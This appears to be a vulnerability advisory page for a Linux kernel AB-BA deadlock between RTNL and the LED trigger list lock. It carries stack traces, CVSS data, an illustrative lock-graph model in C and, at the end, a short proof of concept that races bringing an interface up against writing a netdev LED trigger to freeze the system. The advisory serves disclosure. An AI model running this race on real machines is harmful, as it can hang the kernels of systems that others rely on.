Security Vulnerability Report
CVE-2026-23368 CVSS 5.5 MEDIUM

CVE-2026-23368

Published: 2026-03-25 11:16:36
Last Modified: 2026-04-24 18:41:33
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net: phy: register phy led_triggers during probe to avoid AB-BA deadlock

There is an AB-BA deadlock when both LEDS_TRIGGER_NETDEV and LED_TRIGGER_PHY are enabled:

[ 1362.049207] [<8054e4b8>] led_trigger_register+0x5c/0x1fc <-- Trying to get lock "triggers_list_lock" via down_write(&triggers_list_lock);
[ 1362.054536] [<80662830>] phy_led_triggers_register+0xd0/0x234
[ 1362.060329] [<8065e200>] phy_attach_direct+0x33c/0x40c
[ 1362.065489] [<80651fc4>] phylink_fwnode_phy_connect+0x15c/0x23c
[ 1362.071480] [<8066ee18>] mtk_open+0x7c/0xba0
[ 1362.075849] [<806d714c>] __dev_open+0x280/0x2b0
[ 1362.080384] [<806d7668>] __dev_change_flags+0x244/0x24c
[ 1362.085598] [<806d7698>] dev_change_flags+0x28/0x78
[ 1362.090528] [<807150e4>] dev_ioctl+0x4c0/0x654 <-- Hold lock "rtnl_mutex" by calling rtnl_lock();
[ 1362.094985] [<80694360>] sock_ioctl+0x2f4/0x4e0
[ 1362.099567] [<802e9c4c>] sys_ioctl+0x32c/0xd8c
[ 1362.104022] [<80014504>] syscall_common+0x34/0x58

Here LED_TRIGGER_PHY is registering LED triggers during phy_attach while holding RTNL and then taking triggers_list_lock.

[ 1362.191101] [<806c2640>] register_netdevice_notifier+0x60/0x168 <-- Trying to get lock "rtnl_mutex" via rtnl_lock();
[ 1362.197073] [<805504ac>] netdev_trig_activate+0x194/0x1e4
[ 1362.202490] [<8054e28c>] led_trigger_set+0x1d4/0x360 <-- Hold lock "triggers_list_lock" by down_read(&triggers_list_lock);
[ 1362.207511] [<8054eb38>] led_trigger_write+0xd8/0x14c
[ 1362.212566] [<80381d98>] sysfs_kf_bin_write+0x80/0xbc
[ 1362.217688] [<8037fcd8>] kernfs_fop_write_iter+0x17c/0x28c
[ 1362.223174] [<802cbd70>] vfs_write+0x21c/0x3c4
[ 1362.227712] [<802cc0c4>] ksys_write+0x78/0x12c
[ 1362.232164] [<80014504>] syscall_common+0x34/0x58

Here LEDS_TRIGGER_NETDEV is being enabled on an LED. It first takes triggers_list_lock and then RTNL. A classical AB-BA deadlock.

phy_led_triggers_registers() does not require the RTNL, it does not make any calls into the network stack which require protection. There is also no requirement the PHY has been attached to a MAC, the triggers only make use of phydev state. This allows the call to phy_led_triggers_registers() to be placed elsewhere. PHY probe() and release() don't hold RTNL, so solving the AB-BA deadlock.
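
The lock ordering described above, modelled as an added example (user-space C, not kernel code and not part of the original advisory): a small lockdep-style dependency graph records which lock each path takes while holding another, and reports a cycle for the pre-fix ordering but none once trigger registration moves to probe(). The enum, struct and function names are hypothetical, and the read and write modes of triggers_list_lock are collapsed into a single lock.

```c
#include <stdio.h>

/* Lock names are from the CVE description; the model itself is illustrative. */
enum lock_id { RTNL_MUTEX, TRIGGERS_LIST_LOCK, NLOCKS };

/* dep[a][b] != 0: some path acquires lock b while already holding lock a. */
struct lock_graph { int dep[NLOCKS][NLOCKS]; };

/* Record one code path as the ordered list of locks it nests. */
static void record_path(struct lock_graph *g, const enum lock_id *order, int n)
{
    for (int i = 0; i < n; i++)
        for (int j = i + 1; j < n; j++)
            g->dep[order[i]][order[j]] = 1;
}

/* Transitive closure on a copy; a lock that depends on itself is a cycle. */
static int has_inversion(struct lock_graph g)
{
    for (int k = 0; k < NLOCKS; k++)
        for (int a = 0; a < NLOCKS; a++)
            for (int b = 0; b < NLOCKS; b++)
                g.dep[a][b] |= g.dep[a][k] && g.dep[k][b];
    for (int a = 0; a < NLOCKS; a++)
        if (g.dep[a][a])
            return 1;
    return 0;
}

/* fixed=0: triggers registered under RTNL in phy_attach; fixed=1: in probe(). */
static int can_deadlock(int fixed)
{
    const enum lock_id led_write[]  = { TRIGGERS_LIST_LOCK, RTNL_MUTEX };
    const enum lock_id attach_old[] = { RTNL_MUTEX, TRIGGERS_LIST_LOCK };
    const enum lock_id attach_new[] = { RTNL_MUTEX };
    const enum lock_id probe_new[]  = { TRIGGERS_LIST_LOCK };
    struct lock_graph g = { { { 0 } } };
    record_path(&g, led_write, 2);   /* led_trigger_set -> netdev_trig_activate */
    record_path(&g, fixed ? attach_new : attach_old, fixed ? 1 : 2);
    if (fixed)
        record_path(&g, probe_new, 1);
    return has_inversion(g);
}

int main(void)
{
    printf("before fix: %d, after fix: %d\n", can_deadlock(0), can_deadlock(1));
    return 0;
}
```

The same closure check extends to more than two locks by adding entries to the enum and recording further paths.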

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (Versions prior to fix commits 241cd64c, 2764dcb3, etc.)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-23368 (Conceptual)
 * This script attempts to trigger the AB-BA deadlock by racing
 * a network interface 'up' operation against an LED trigger write.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>

void trigger_led() {
    // Path may vary depending on hardware configuration
    const char *trigger_path = "/sys/class/leds/phy0/trigger";
    int fd = open(trigger_path, O_WRONLY);
    if (fd >= 0) {
        write(fd, "netdev", 6);
        close(fd);
    }
}

void bring_up_netdev() {
    // Replace eth0 with actual interface managed by the PHY
    system("ip link set eth0 up");
}

int main() {
    pid_t pid = fork();
    if (pid == 0) {
        bring_up_netdev(); // Thread 1: Holds rtnl_mutex, wants triggers_list_lock
    } else {
        usleep(20000); // Attempt to hit the race window
        trigger_led(); // Thread 2: Holds triggers_list_lock, wants rtnl_mutex
    }
    return 0;
}
